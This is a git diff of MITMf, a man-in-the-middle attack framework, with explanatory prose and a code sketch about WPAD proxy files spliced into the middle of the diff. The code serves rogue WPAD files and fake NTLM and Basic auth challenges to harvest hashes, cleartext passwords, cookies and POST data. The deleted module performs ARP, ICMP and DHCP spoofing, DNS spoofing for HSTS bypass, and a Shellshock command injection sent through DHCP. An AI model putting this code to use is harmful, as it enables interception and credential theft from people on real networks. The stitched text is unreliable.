"Content-Type: text/html\r\n"), + ("WWW-Auth", "Proxy-Authenticate: NTLM\r\n"), + ("Connection", "Connection: close \r\n"), + ("PConnection", "proxy-Connection: close \r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP NTLM packet. 
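The WPADScript packet above serves a minimal proxy auto-config (PAC) file: a browser that resolves the WPAD name fetches it, evaluates FindProxyForURL(), and starts routing HTTP through the rogue proxy at wpadwpadwpad:3141, while calculate() fixes up Content-Length to match the payload. A sketch of the resulting response, reduced to the headers that matter:

```python
pac = "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"

response = ("HTTP/1.1 200 OK\r\n"
            "Content-Type: application/x-ns-proxy-autoconfig\r\n"
            # Content-Length is what WPADScript.calculate() recomputes from the payload
            "Content-Length: " + str(len(pac)) + "\r\n\r\n" + pac)
print(response)
```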
+class IIS_407_NTLM_Challenge_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Authentication Required\r\n"), + ("Via", "Via: 1.1 SMB-TOOLKIT\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWWAuth", "Proxy-Authenticate: NTLM "), + ("Payload", ""), + ("Payload-CRLF", "\r\n"), + ("PoweredBy", "X-Powered-By: SMB-TOOLKIT\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + + def calculate(self,payload): + self.fields["Payload"] = b64encode(payload) + +#HTTP Basic answer packet. +class IIS_Basic_407_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 407 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "Proxy-Authenticate: Basic realm=\"ISAServer\"\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP Packet used for further NTLM auth. +class IIS_Auth_401_Ans(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 401 Unauthorized\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("Len", "Content-Length: 0\r\n"), + ("CRLF", "\r\n"), + ]) + +#HTTP Packet Granted auth. +class IIS_Auth_Granted(Packet): + fields = OrderedDict([ + ("Code", "HTTP/1.1 200 OK\r\n"), + ("ServerType", "Server: Microsoft-IIS/6.0\r\n"), + ("Date", "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"), + ("Type", "Content-Type: text/html\r\n"), + ("WWW-Auth", "WWW-Authenticate: NTLM\r\n"), + ("PoweredBy", "X-Powered-By: ASP.NET\r\n"), + ("ContentLen", "Content-Length: "), + ("ActualLen", "76"), + ("CRLF", "\r\n\r\n"), + ("Payload", "\n\n\n\nLoading\n\n\n"), + ]) + def calculate(self): + self.fields["ActualLen"] = len(str(self.fields["Payload"])) + +#HTTP NTLM Auth +class NTLM_Challenge(Packet): + fields = OrderedDict([ + ("Signature", "NTLMSSP"), + ("SignatureNull", "\x00"), + ("MessageType", "\x02\x00\x00\x00"), + ("TargetNameLen", "\x06\x00"), + ("TargetNameMaxLen", "\x06\x00"), + ("TargetNameOffset", "\x38\x00\x00\x00"), + ("NegoFlags", "\x05\x02\x89\xa2"), + ("ServerChallenge", ""), + ("Reserved", "\x00\x00\x00\x00\x00\x00\x00\x00"), + ("TargetInfoLen", "\x7e\x00"), + ("TargetInfoMaxLen", "\x7e\x00"), + ("TargetInfoOffset", "\x3e\x00\x00\x00"), + ("NTLMOsVersion", "\x05\x02\xce\x0e\x00\x00\x00\x0f"), + ("TargetNameStr", "SMB"), + ("Av1", "\x02\x00"),#nbt name + ("Av1Len", "\x06\x00"), + ("Av1Str", "SMB"), + ("Av2", "\x01\x00"),#Server name + ("Av2Len", "\x14\x00"), + ("Av2Str", "SMB-TOOLKIT"), + ("Av3", "\x04\x00"),#Full Domain name + ("Av3Len", "\x12\x00"), + ("Av3Str", "smb.local"), + ("Av4", "\x03\x00"),#Full machine domain name + ("Av4Len", "\x28\x00"), + ("Av4Str", "server2003.smb.local"), + ("Av5", "\x05\x00"),#Domain Forest Name + ("Av5Len", "\x12\x00"), + ("Av5Str", "smb.local"), + ("Av6", "\x00\x00"),#AvPairs Terminator + ("Av6Len", "\x00\x00"), + ]) + + def calculate(self): + ##First convert to uni + self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le') + self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le') + self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le') + self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le') + self.fields["Av4Str"] = 
self.fields["Av4Str"].encode('utf-16le') + self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le') + + ##Then calculate + CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"]) + + CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"]) + + CalculateAvPairsLen = str(self.fields["Av1"])+str(self.fields["Av1Len"])+str(self.fields["Av1Str"])+str(self.fields["Av2"])+str(self.fields["Av2Len"])+str(self.fields["Av2Str"])+str(self.fields["Av3"])+str(self.fields["Av3Len"])+str(self.fields["Av3Str"])+str(self.fields["Av4"])+str(self.fields["Av4Len"])+str(self.fields["Av4Str"])+str(self.fields["Av5"])+str(self.fields["Av5Len"])+str(self.fields["Av5Str"])+str(self.fields["Av6"])+str(self.fields["Av6Len"]) + + # Target Name Offsets + self.fields["TargetNameOffset"] = struct.pack(" 24: + NthashLen = 64 + DomainLen = struct.unpack('2: + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + #print PostData + mitmf_logger.info(PostData) + +#Handle HTTP packet sequence. +def PacketSequence(data,client): + Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) + BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) + + if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): + File = config.get('HTTP Server', 'ExecFilename') + buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) + buffer1.calculate() + return str(buffer1) + + if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): + if IsExecutable(FILENAME): + buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) + buffer1.calculate() + return str(buffer1) + else: + buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) + buffer1.calculate() + return str(buffer1) + + if Ntlm: + packetNtlm = b64decode(''.join(Ntlm))[8:9] + if packetNtlm == "\x01": + GrabURL(data,client) + GrabCookie(data,client) + r = NTLM_Challenge(ServerChallenge=Challenge) + r.calculate() + t = IIS_NTLM_Challenge_Ans() + t.calculate(str(r)) + buffer1 = str(t) + return buffer1 + if packetNtlm == "\x03": + NTLM_Auth= b64decode(''.join(Ntlm)) + ParseHTTPHash(NTLM_Auth,client) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + mitmf_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + if BasicAuth: + GrabCookie(data,client) + GrabURL(data,client) + outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" + WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) + mitmf_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): + Message = "[+]WPAD (auth) file sent to: %s"%(client) + if Verbose: + print Message + mitmf_logger.info(Message) + buffer1 = WpadCustom(data,client) + return buffer1 + else: + buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) + buffer1.calculate() + return str(buffer1) + + 
else: + return str(Basic_Ntlm(Basic)) + +#HTTP Server Class +class HTTP(BaseRequestHandler): + + def handle(self): + try: + while True: + self.request.settimeout(1) + data = self.request.recv(8092) + buff = WpadCustom(data,self.client_address[0]) + if buff and WpadForcedAuth(Force_WPAD_Auth) == False: + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) + if Verbose: + print Message + mitmf_logger.info(Message) + self.request.send(buff) + else: + buffer0 = PacketSequence(data,self.client_address[0]) + self.request.send(buffer0) + except Exception: + pass#No need to be verbose.. + \ No newline at end of file diff --git a/core/responder/wpad/__init__.py b/core/responder/wpad/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index d048d6e..0a64cea 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -93,7 +93,14 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) + try: + postdata = self.postData.decode('utf8') #Anything that we can't decode to utf-8 isn't worth logging + if len(postdata) > 0: + mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], postdata)) + except UnicodeDecodeError: + mitmf_logger.debug("[ServerConnection] {} Ignored post data from {}".format(self.client.getClientIP(), self.headers['host'])) + pass + self.transport.write(self.postData) def connectionMade(self): @@ -248,5 +255,3 @@ class ServerConnection(HTTPClient): self.transport.loseConnection() except: pass - - diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 4d632f1..9ef7b78 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -18,7 +18,7 @@ import re, os import logging -from core.ConfigWatcher import ConfigWatcher +from core.configwatcher import ConfigWatcher mitmf_logger = logging.getLogger('mimtf') diff --git a/core/utils.py b/core/utils.py index 4d83911..059cc61 100644 --- a/core/utils.py +++ b/core/utils.py @@ -20,17 +20,66 @@ # import os -import sys import random import logging +import re +import sys logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy from scapy.all import get_if_addr, get_if_hwaddr +mitmf_logger = logging.getLogger('mitmf') + +class ImportDir: + #--------------------------------------------------------------------------------------------------- + # http://gitlab.com/aurelien-lourot/importdir + #--------------------------------------------------------------------------------------------------- + + # File name of a module: + __module_file_regexp = "(.+)\.py(c?)$" + + #--------------------------------------------------------------------------------------------------- + # Interface + #--------------------------------------------------------------------------------------------------- + + def do(self, path, env): + """ Imports all modules residing directly in directory "path" into the provided environment + (usually the callers environment). 
A typical call: + importdir.do("example_dir", globals()) + """ + self.__do(path, env) + + + #--------------------------------------------------------------------------------------------------- + # Implementation + #--------------------------------------------------------------------------------------------------- + + def get_module_names_in_dir(self, path): + """ Returns a set of all module names residing directly in directory "path". + """ + result = set() + + # Looks for all python files in the directory (not recursively) and add their name to result: + for entry in os.listdir(path): + if os.path.isfile(os.path.join(path, entry)): + regexp_result = re.search(self.__module_file_regexp, entry) + if regexp_result: # is a module file name + result.add(regexp_result.groups()[0]) + + return result + + def __do(self, path, env): + """ Implements do(). + """ + sys.path.append(path) # adds provided directory to list we can import from + for module_name in sorted(self.get_module_names_in_dir(path)): # for each found module... + env[module_name] = __import__(module_name) # ... import + class SystemConfig: @staticmethod def setIpForwarding(value): + mitmf_logger.debug("[Utils] Setting ip forwarding to {}".format(value)) with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: file.write(str(value)) file.close() @@ -40,11 +89,11 @@ class SystemConfig: try: ip_address = get_if_addr(interface) if (ip_address == "0.0.0.0") or (ip_address is None): - sys.exit("[-] Interface {} does not have an assigned IP address".format(interface)) + exit("[Utils] Interface {} does not have an assigned IP address".format(interface)) return ip_address except Exception, e: - sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e)) + exit("[Utils] Error retrieving IP address from {}: {}".format(interface, e)) @staticmethod def getMAC(interface): @@ -52,7 +101,7 @@ class SystemConfig: mac_address = get_if_hwaddr(interface) return mac_address except Exception, e: - sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e)) + exit("[Utils] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: @@ -70,15 +119,18 @@ class IpTables: return IpTables._instance def Flush(self): + mitmf_logger.debug("[Utils] Flushing iptables") os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') self.dns = False self.http = False def HTTP(self, http_redir_port): + mitmf_logger.debug("[Utils] Setting iptables HTTP redirection rule from port 80 to {}".format(http_redir_port)) os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port)) self.http = True def DNS(self, ip, port): + mitmf_logger.debug("[Utils] Setting iptables DNS redirection rule from port 53 to {}:{}".format(ip, port)) os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port)) self.dns = True diff --git a/core/wrappers/protocols.py b/core/wrappers/protocols.py deleted file mode 100644 index 1dc17a5..0000000 --- a/core/wrappers/protocols.py +++ /dev/null @@ -1,378 +0,0 @@ -#!/usr/bin/env python2.7 - -# Copyright (c) 2014-2016 Marcello Salvati -# -# This program is free software; you can redistribute it and/or -# modify it under the terms of the GNU General Public License as -# published by the Free Software Foundation; either version 3 of the -# License, or (at your option) any later version. 
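The SystemConfig helpers above wrap the scapy interface lookups and the ip_forward sysctl that the framework needs before it can route victim traffic. Typical use looks roughly like this (a sketch; the interface name is a placeholder, and the calls require root and scapy):

```python
from core.utils import SystemConfig

iface = "eth0"                          # placeholder interface name
ip = SystemConfig.getIP(iface)          # exits with an error if no address is assigned
mac = SystemConfig.getMAC(iface)
SystemConfig.setIpForwarding(1)         # writes "1" to /proc/sys/net/ipv4/ip_forward

print("%s -> %s / %s" % (iface, ip, mac))
```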
-# -# This program is distributed in the hope that it will be useful, but -# WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program; if not, write to the Free Software -# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 -# USA -# - -import logging -import threading -import binascii -import random -#import dns.resolver - -from base64 import b64decode -from urllib import unquote -from time import sleep -#from netfilterqueue import NetfilterQueue - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import * - -mitmf_logger = logging.getLogger('mitmf') - -class _DHCP(): - - def __init__(self, interface, dhcpcfg, ip, mac): - self.interface = interface - self.ip_address = ip - self.mac_address = mac - self.shellshock = None - self.debug = False - self.dhcpcfg = dhcpcfg - self.rand_number = [] - self.dhcp_dic = {} - - def start(self): - t = threading.Thread(name="dhcp_spoof", target=self.dhcp_sniff, args=(self.interface,)) - t.setDaemon(True) - t.start() - - def dhcp_sniff(self, interface): - sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=interface) - - def dhcp_rand_ip(self): - pool = self.dhcpcfg['ip_pool'].split('-') - trunc_ip = pool[0].split('.'); del(trunc_ip[3]) - max_range = int(pool[1]) - min_range = int(pool[0].split('.')[3]) - number_range = range(min_range, max_range) - for n in number_range: - if n in self.rand_number: - number_range.remove(n) - rand_number = random.choice(number_range) - self.rand_number.append(rand_number) - rand_ip = '.'.join(trunc_ip) + '.' 
+ str(rand_number) - - return rand_ip - - def dhcp_callback(self, resp): - if resp.haslayer(DHCP): - xid = resp[BOOTP].xid - mac_addr = resp[Ether].src - raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) - if xid in self.dhcp_dic.keys(): - client_ip = self.dhcp_dic[xid] - else: - client_ip = self.dhcp_rand_ip() - self.dhcp_dic[xid] = client_ip - - if resp[DHCP].options[0][1] is 1: - mitmf_logger.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid)) - mitmf_logger.info("Sending DHCP OFFER") - packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / - IP(src=self.ip_address, dst='255.255.255.255') / - UDP(sport=67, dport=68) / - BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / - DHCP(options=[("message-type", "offer"), - ('server_id', self.ip_address), - ('subnet_mask', self.dhcpcfg['subnet']), - ('router', self.ip_address), - ('lease_time', 172800), - ('renewal_time', 86400), - ('rebinding_time', 138240), - "end"])) - - try: - packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) - except KeyError: - pass - - sendp(packet, iface=self.interface, verbose=self.debug) - - if resp[DHCP].options[0][1] is 3: - mitmf_logger.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid)) - packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') / - IP(src=self.ip_address, dst='255.255.255.255') / - UDP(sport=67, dport=68) / - BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) / - DHCP(options=[("message-type", "ack"), - ('server_id', self.ip_address), - ('subnet_mask', self.dhcpcfg['subnet']), - ('router', self.ip_address), - ('lease_time', 172800), - ('renewal_time', 86400), - ('rebinding_time', 138240)])) - - try: - packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server']))) - except KeyError: - pass - - if self.shellshock: - mitmf_logger.info("Sending DHCP ACK with shellshock payload") - packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock))) - packet[DHCP].options.append("end") - else: - mitmf_logger.info("Sending DHCP ACK") - packet[DHCP].options.append("end") - - sendp(packet, iface=self.interface, verbose=self.debug) - -class _ARP(): - - def __init__(self, gateway, interface, mac): - - self.gateway = gateway - self.gatewaymac = getmacbyip(gateway) - self.mac = mac - self.target = None - self.targetmac = None - self.interface = interface - self.arpmode = 'req' - self.debug = False - self.send = True - self.arp_inter = 3 - - def start(self): - if self.gatewaymac is None: - sys.exit("[-] Error: Could not resolve gateway's MAC address") - - if self.target: - self.targetmac = getmacbyip(self.target) - if self.targetmac is None: - sys.exit("[-] Error: Could not resolve target's MAC address") - - if self.arpmode == 'req': - pkt = self.build_arp_req() - - elif self.arpmode == 'rep': - pkt = self.build_arp_rep() - - t = threading.Thread(name='arp_spoof', target=self.send_arps, args=(pkt, self.interface, self.debug,)) - t.setDaemon(True) - t.start() - - def send_arps(self, pkt, interface, debug): - while self.send: - sendp(pkt, inter=self.arp_inter, iface=interface, verbose=debug) - - def stop(self): - self.send = False - sleep(3) - self.arp_inter = 1 - - if self.target: - print "\n[*] Re-ARPing target" - self.reARP_target(5) - - print "\n[*] Re-ARPing network" - self.reARP_net(5) - - def build_arp_req(self): - if self.target is None: - pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, 
psrc=self.gateway, pdst=self.gateway) - elif self.target: - pkt = Ether(src=self.mac, dst=self.targetmac)/\ - ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target) - - return pkt - - def build_arp_rep(self): - if self.target is None: - pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2) - elif self.target: - pkt = Ether(src=self.mac, dst=self.targetmac)/\ - ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=self.targetmac, pdst=self.target, op=2) - - return pkt - - def reARP_net(self, count): - pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\ - ARP(psrc=self.gateway, hwsrc=self.gatewaymac, op=2) - - sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface) - - def reARP_target(self, count): - pkt = Ether(src=self.gatewaymac, dst='ff:ff:ff:ff:ff:ff')/\ - ARP(psrc=self.target, hwsrc=self.targetmac, op=2) - - sendp(pkt, inter=self.arp_inter, count=count, iface=self.interface) - -class _ICMP(): - - def __init__(self, interface, target, gateway, ip_address): - - self.target = target - self.gateway = gateway - self.interface = interface - self.ip_address = ip_address - self.debug = False - self.send = True - self.icmp_interval = 2 - - def build_icmp(self): - pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\ - IP(src=self.target, dst=self.gateway)/UDP() - - return pkt - - def start(self): - pkt = self.build_icmp() - - t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,)) - t.setDaemon(True) - t.start() - - def stop(self): - self.send = False - sleep(3) - - def send_icmps(self, pkt, interface, debug): - while self.send: - sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug) - -""" -class _DNS(): - - hsts = False - dns = False - hstscfg = None - dnscfg = None - _instance = None - nfqueue = None - queue_number = 0 - - def __init__(self): - self.nfqueue = NetfilterQueue() - t = threading.Thread(name='nfqueue', target=self.bind, args=()) - t.setDaemon(True) - t.start() - - @staticmethod - def getInstance(): - if _DNS._instance is None: - _DNS._instance = _DNS() - - return _DNS._instance - - @staticmethod - def checkInstance(): - if _DNS._instance is None: - return False - else: - return True - - def bind(self): - self.nfqueue.bind(self.queue_number, self.callback) - self.nfqueue.run() - - def stop(self): - try: - self.nfqueue.unbind() - except: - pass - - def enableHSTS(self, config): - self.hsts = True - self.hstscfg = config - - def enableDNS(self, config): - self.dns = True - self.dnscfg = config - - def resolve_domain(self, domain): - try: - mitmf_logger.debug("Resolving -> %s" % domain) - answer = dns.resolver.query(domain, 'A') - real_ips = [] - for rdata in answer: - real_ips.append(rdata.address) - - if len(real_ips) > 0: - return real_ips - - except Exception: - mitmf_logger.info("Error resolving " + domain) - - def callback(self, payload): - try: - #mitmf_logger.debug(payload) - pkt = IP(payload.get_payload()) - - if not pkt.haslayer(DNSQR): - payload.accept() - return - - if pkt.haslayer(DNSQR): - mitmf_logger.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype)) - if self.dns: - for k, v in self.dnscfg.items(): - if k in pkt[DNSQR].qname: - self.modify_dns(payload, pkt, v) - return - - payload.accept() - - elif self.hsts: - if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1): - for k,v in self.hstscfg.items(): - if v == pkt[DNSQR].qname[:-1]: - ip = self.resolve_domain(k) - if ip: - 
self.modify_dns(payload, pkt, ip) - return - - if 'wwww' in pkt[DNSQR].qname: - ip = self.resolve_domain(pkt[DNSQR].qname[1:-1]) - if ip: - self.modify_dns(payload, pkt, ip) - return - - if 'web' in pkt[DNSQR].qname: - ip = self.resolve_domain(pkt[DNSQR].qname[3:-1]) - if ip: - self.modify_dns(payload, pkt, ip) - return - - payload.accept() - - except Exception, e: - print "Exception occurred in nfqueue callback: " + str(e) - - def modify_dns(self, payload, pkt, ip): - try: - spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\ - UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\ - DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd) - - if self.hsts: - spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field - for i in ip: - spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i)) - mitmf_logger.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) - payload.set_payload(str(spoofed_pkt)) - payload.accept() - - if self.dns: - spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip) - mitmf_logger.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1])) - payload.set_payload(str(spoofed_pkt)) - payload.accept() - - except Exception, e: - print "Exception occurred while modifying DNS: " + str(e) -""" \ No newline at end of file diff --git a/libs/bdfactory b/libs/bdfactory index e6af51b..4609ade 160000 --- a/libs/bdfactory +++ b/libs/bdfactory @@ -1 +1 @@ -Subproject commit e6af51b0c921e7c3dd5bb10a0d7b3983f46ca32b +Subproject commit 4609adeb5383135352aa27113d8ee1398aecff99 diff --git a/libs/responder b/libs/responder deleted file mode 160000 index fe4eab5..0000000 --- a/libs/responder +++ /dev/null @@ -1 +0,0 @@ -Subproject commit fe4eab580de4ba89d82c16d88670c72c712c332a diff --git a/mitmf.py b/mitmf.py index 97bedfe..6c773c3 100755 --- a/mitmf.py +++ b/mitmf.py @@ -18,53 +18,46 @@ # USA # -import sys import argparse +import sys import os import logging +import threading +import user_agents from twisted.web import http from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins -from core.utils import Banners -from core.configwatcher import ConfigWatcher - +from core.utils import Banners, SystemConfig from plugins import * -try: - import user_agents -except ImportError: - print "[-] user_agents library missing! User-Agent parsing will be disabled!" 
- -mitmf_version = "0.9.6-dev" -sslstrip_version = "0.9" -sergio_version = "0.2.1" -dnschef_version = "0.4" - Banners().printBanner() if os.geteuid() != 0: sys.exit("[-] When man-in-the-middle you want, run as r00t you will, hmm?") -parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') +mitmf_version = "0.9.7" +sslstrip_version = "0.9" +sergio_version = "0.2.1" +dnschef_version = "0.4" +netcreds_version = "1.0" + +parser = argparse.ArgumentParser(description="MITMf v{} - Framework for MITM attacks".format(mitmf_version), version=mitmf_version, usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]', epilog="Use wisely, young Padawan.",fromfile_prefix_chars='@') + #add MITMf options mgroup = parser.add_argument_group("MITMf", "Options for MITMf") mgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]") mgroup.add_argument("-i", "--interface", required=True, type=str, metavar="interface" ,help="Interface to listen on") mgroup.add_argument("-c", "--config-file", dest='configfile', type=str, default="./config/mitmf.conf", metavar='configfile', help="Specify config file to use") -mgroup.add_argument('-d', '--disable-proxy', dest='disproxy', action='store_true', default=False, help='Only run plugins, disable all proxies') -#added by alexander.georgiev@daloo.de mgroup.add_argument('-m', '--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically') #add sslstrip options sgroup = parser.add_argument_group("SSLstrip", "Options for SSLstrip library") -#sgroup.add_argument("-w", "--write", type=argparse.FileType('w'), metavar="filename", default=sys.stdout, help="Specify file to log to (stdout by default).") slogopts = sgroup.add_mutually_exclusive_group() slogopts.add_argument("-p", "--post", action="store_true",help="Log only SSL POSTs. 
(default)") slogopts.add_argument("-s", "--ssl", action="store_true", help="Log all SSL traffic to and from server.") slogopts.add_argument("-a", "--all", action="store_true", help="Log all SSL and HTTP traffic to and from server.") -#slogopts.add_argument("-c", "--clients", action='store_true', default=False, help='Log each clients data in a seperate file') #not fully tested yet sgroup.add_argument("-l", "--listen", type=int, metavar="port", default=10000, help="Port to listen on (default 10000)") sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.") sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") @@ -76,8 +69,8 @@ plugins = [] try: for p in plugin_classes: plugins.append(p()) -except: - print "Failed to load plugin class {}".format(p) +except Exception, e: + print "[-] Failed to load plugin class {}: {}".format(p, e) #Give subgroup to each plugin with options try: @@ -94,28 +87,36 @@ try: except NotImplementedError: sys.exit("[-] {} plugin claimed option support, but didn't have it.".format(p.name)) +if len(sys.argv) is 1: + parser.print_help() + sys.exit(1) + args = parser.parse_args() -log_level = logging.__dict__[args.log_level.upper()] +#first check to see if we supplied a valid interface +myip = SystemConfig.getIP(args.interface) +mymac = SystemConfig.getMAC(args.interface) #Start logging +log_level = logging.__dict__[args.log_level.upper()] + logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S") mitmf_logger = logging.getLogger('mitmf') - fileHandler = logging.FileHandler("./logs/mitmf.log") fileHandler.setFormatter(logFormatter) mitmf_logger.addHandler(fileHandler) ##################################################################################################### -#All our options should be loaded now, pass them onto plugins +#All our options should be loaded now, initialize the plugins print "[*] MITMf v{} online... 
